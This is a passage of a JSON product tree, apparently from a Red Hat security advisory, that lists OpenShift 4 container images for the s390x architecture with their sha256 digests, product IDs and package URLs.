"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3Aed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Afc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Aae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3Ad85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3A5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3Ad710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3Ab7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3Ae3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3Ac17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3Ad48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3Adcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3A6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3A0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3A9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3A1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3Ad1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Aa8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3Aeb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3Ae81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3A0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3A48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3Abe277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
